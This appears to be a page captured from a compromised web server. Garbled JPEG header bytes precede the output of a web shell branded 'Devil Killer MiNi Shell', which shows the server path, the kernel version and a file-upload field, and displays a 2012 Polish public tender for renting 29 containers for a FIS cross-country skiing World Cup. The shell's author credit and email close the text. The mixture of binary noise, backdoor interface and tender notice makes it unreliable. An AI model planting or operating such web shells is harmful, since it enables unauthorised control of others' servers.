JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120120/19315-N-2012.html

<p class="kh_header"><b>Szklarska Poręba: wynajem 29 sztuk kontenerów na potrzeby organizacji zawodów Pucharu Świata FIS  w narciarstwie biegowym Szklarska Poręba -  Jakuszyce 2012</b><br>
<b>Numer ogłoszenia: 19315 - 2012; data zamieszczenia: 20.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SPORT SZKLARSKA PORĘBA  Sp. z o.o. , ul. Turystyczna 26, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 75 717 20 63, faks 75 717 20 63.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wynajem 29 sztuk kontenerów na potrzeby organizacji zawodów Pucharu Świata FIS  w narciarstwie biegowym Szklarska Poręba -  Jakuszyce 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje :

   a)   dostawa i ułożenie bloczków betonowych stanowiących miejsce posadowienia kontenerów,  przy czym      
         przygotowanie terenu tj. zdjęcie warstwy śniegu do poziomu gruntu leży po stronie  Zamawiającego ;

   b) załadunek , transport i rozładunek kontenerów w miejscu ich  docelowej lokalizacji na Polanie    Jakuszyckiej ;

   c)  montaż kontenerów na uprzednio przygotowanym ,przez Wykonawcę, podłożu ;

   d)  podłączenie kontenerów do istniejącej instalacji elektrycznej, przy czym doprowadzenie zasilania (wykonanie ZK)   do  pierwszego kontenera  leży po stronie Zamawiającego. 
        Wstępne zabezpieczenie mocy dla wszystkich kontenerów ok. 80 kW.

   e) podłączenie kontenera umywalniowego  do istniejącej  sieci  hydrantowej.
        Hydrant  zlokalizowany  w odległości ok. 2 m od miejsca posadowienia kontenera umywalniowego. 

   f)  odprowadzenie ścieków - wywóz ze zbiornika umieszczonego przy  lub pod  kontenerem umywalniowym ; 



  
   g) wynajem  kontenerów na  czas wymagany przez Zamawiającego ;

   h) w kontenerze umywalniowym świadczenie usługi dyżuru czystościowego przez trzy (3)  dni  tj. 
       16, 17 i 18 lutego 2012 r.  w godz.    od  12:30   do  16:30;


 oraz  po zakończeniu okresu wynajmu kontenerów :


i)	 opróżnienie zbiornika na ścieki  (wykonanie serwisu końcowego zbiornika);
 j)   sprzątanie końcowe 29 sztuk  kontenerów;

k)  odłączenie kontenerów od zasilania energetycznego  i  sieci  hydrantowej;

   l)   demontaż, załadunek i wywiezienie kontenerów z miejsca dotychczasowej lokalizacji ( terenu wioski 
         zawodniczej) ;  
   
m)	 uprzątnięcie terenu po zakończonym demontażu  kontenerów. 


3.	Wymagania techniczne_ warunki   dla każdego z wynajmowanych kontenerów
3.1	  Kontenery   biurowe  -  28 sztuk  ,  przeznaczone  na pomieszczenia techniczne, w których dla zawodników przygotowywane będą narty biegowe :

- wymiary  zewnętrzny 6000* 2500* 2800 [mm]  z dopuszczalną tolerancją   ?  2,5% , przy czym wysokość pomieszczenia w świetle nie może być mniejsza niż 2,5 [m] ;

- możliwość ustawienia kontenerów w rzędzie - na styk dłuższymi bokami;  

- jedno , duże okno uchylno-rozwierne  z zewnętrzną roletą  antywłamaniową ,   umieszczone na ścianie bocznej kontenera ( krótszej)  ;

- drzwi pełne, stalowe, zamykane za zamek z wkładką patentową  ,  umieszczone na ścianie bocznej kontenera ( krótszej)     i przeciwległej do ściany z oknem ;  

- system wentylacyjny ( wydajność  min. 100 m3/h ) ;

- grzejnik elektryczny umożliwiający utrzymanie w pomieszczeniu temperatury  ok. 200 C  ; 

- minimum dwa gniazda elektryczne ;

- oświetlenie  górne , o natężeniu jak dla pomieszczeń biurowych ;

- wykładzina podłogowa PCV .

3.2	 Kontener umywalniowy  -  1 sztuka :

- wymiar zewnętrzny 3000 * 2500  [mm]   z dopuszczalną tolerancją   ?  10 % , przy czym wysokość pomieszczenia w świetle nie może być mniejsza niż 2,5 [m] ;

- zbiornik na ścieki ;



- wewnątrz _  dwa pomieszczenia z osobnym wejściem ,  wyposażone:
            1 pomieszczenie:  2 umywalki klasyczne min. 40 , z doprowadzoną ciepłą i zimną wodą 
                                             grzejnik elektryczny
                                             bojler elektryczny o poj. min. 10l
                                             2 lustra
                                             podajnik na ręczniki papierowe    

            2 pomieszczenie:   3 umywalki klasyczne min. 40, z doprowadzoną ciepłą i zimną wodą 
                                             grzejnik elektryczny
                                             bojler elektryczny o poj. min. 10l
                                             3 lustra
                                             podajnik na ręczniki papierowe.

Dopuszcza się wynajem kontenera bez wewnętrznego podziału na pomieszczenia , wyposażonego  w  minimum 5 umywalek z doprowadzoną ciepłą i zimną wodą, jeden bojler elektryczny o pojemności min. 20 l lub zamiennie : 2 bojlery  o pojemności min. 10 l każdy,  minimum 5 luster , 2 podajniki na ręczniki papierowe,  1 grzejnik elektryczny o większej mocy lub dwa o mocy mniejszej. 

 - wykładzina podłogowa PCV ;

 - oświetlenie standardowe  ( boczne nad umywalkami  lub górne)  jak dla pomieszczeń      sanitarnych ;

 - system wentylacji uruchamiany wyłącznikiem  oświetlenia , zapewniający niezbędne przewietrzanie
   pomieszczenia, przy czym  dopuszcza się wspomaganie uchylnym  okienkiem ;

-  drzwi zewnętrzne  zamykane na klucz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.31.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poparta należytym wykonaniem w okresie ostatnich 3 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie -  realizacji minimum trzech (3) zamówień związanych z dostawą i montażem  co najmniej 10 kontenerów            w każdym zamówieniu  . 

Wykonawca zobowiązany jest przedłożyć wykaz wykonanych dostaw łącznie z montażem według wzoru stanowiącego Załącznik Nr 4, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie.

W przypadku wykazania wartości wykonanych robót  w walutach innych niż PLN -  należy podać kwotę w PLN, , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na  PLN wg średniego kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień 30 listopada 2011 r. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym  jeżeli  dotyczy to środków finansowych, o których mowa w punkcie 1.4.a) - od takiego podmiotu wymagane jest złożenie oświadczenia jak od wykonawcy. 
Zobowiązanie musi być  złożone w formie oryginału.

W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW

Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie odpowiednim potencjałem technicznym oraz osobami  zdolnymi  do wykonania  zamówienia, tj.  wskazać do uczestnictwa w wykonaniu niniejszego zamówienia  Kierownika Budowy lub kierownika montażu     posiadającego :

°  co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy i_lub 
    kierownika montażu , 
° uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej   obowiązujących przepisów 
° ważny na dzień upływu terminu  składania ofert dokument potwierdzający przynależność  do   właściwej  Izby Inżynierów Budownictwa,
Przez wymagany  minimalny okres  doświadczenia zawodowego   należy rozumieć  łączną ilość   miesięcy przepracowanych  na stanowisku kierownika budowy i_lub kierownika montażu obiektów budowlanych          z wyłączeniem obiektów małej architektury , w okresie od daty uzyskania uprawnień budowlanych do daty ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych .
Do minimalnego okresu doświadczenia zawodowego na stanowisku kierownika budowy i_lub kierownika montażu nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie . 

Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego.    
Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
Dysponowanie osobą  wymienioną  powyżej  nie wyczerpuje  całości personelu, jakim wykonawca winien dysponować do  rzetelnego wypełnienia zobowiązań wynikajacych z realizacji zamówienia. 
Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:

a)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osoby   odpowiedzialnej za kierowanie robotami montażowymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez te osoby czynności wraz z  informacją o podstawie dysponowania tymi osobami - Załącznik Nr 5 do IDW  

b)	Oświadczenie, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia pełniąc funkcje kierownika budowy_montażu, posiada wymagane uprawnienia wydane zgodnie z przepisami ustawy          z 07.07.1994 r. Prawa budowlanego - Załącznik Nr 6 do IDW
Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym  jeżeli  dotyczy to środków finansowych, o których mowa w punkcie 1.4.a) - od takiego podmiotu wymagane jest złożenie oświadczenia jak od wykonawcy. 
Zobowiązanie musi być  złożone w formie oryginału.

 W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie łączny potencjał  kadrowy - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW.
   
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poparta posiadaniem : 

a)  środków finansowych  lub zdolności kredytowej lub środków finansowych i zdolności kredytowej 
- w wysokości co najmniej   50 000 PLN  -  w oparciu o złożone oświadczenie 

b)	opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia      w wysokości  stanowiącej co najmniej  równowartość ceny ofertowej za wykonanie przedmiotu zamówienia. 



W przypadku wykazania sumy ubezpieczenia wykazanej w walucie obcej, Zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski  na dzień 30 listopada 2011 r. 

Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od
odpowiedzialności cywilnej  zostanie wezwany wykonawca , którego oferta uznana zostanie za najkorzystniejszą   -  przed podpisaniem umowy.

Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia- Załącznik Nr 7 do IDW,   przy czym   od  podmiotu udostępniajacego  wymagane jest złożenie oświadczenia jak od wykonawcy. 
Zobowiązanie musi być  złożone w formie oryginału.

W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich  łączna sytuacja ekonomiczna      i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia( konsorcjum, spółka cywilna)  wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału   w postępowaniu ( art.22 ust. 1 u.p.z.p.)    - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający  przewiduje możliwości zmiany zawartej  umowy :  

a)	w przypadku  klęski żywiołowej  lub nagłych, nieprzewidywalnych i negatywnych zmian warunków   atmosferycznych powodujących odwołanie zawodów Pucharu Świata FIS w narciarstwie biegowym ,

b)	konieczności zmiany osoby  nadzorującej realizację przedmiotu zamówienia - kierownika budowy/   kierownika montażu,

c)	zmiany części zamówienia realizowanej z udziałem podwykonawcy(ów),

d  ) zmiany podwykonawcy lub konieczności wprowadzenia dodatkowo podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sport.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2012 godzina 09:30, miejsce: za pośrednictwem np.operatora publicznego: SPORT Szklarska Poręba Spółka z o.o. ul.Mickiewicza 21,58-580 Szklarska Poręba,sk.pocztowa 151 lub złożyć w Biurze ( z wyjatkiem soboty) godz.8-16, adres jw..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com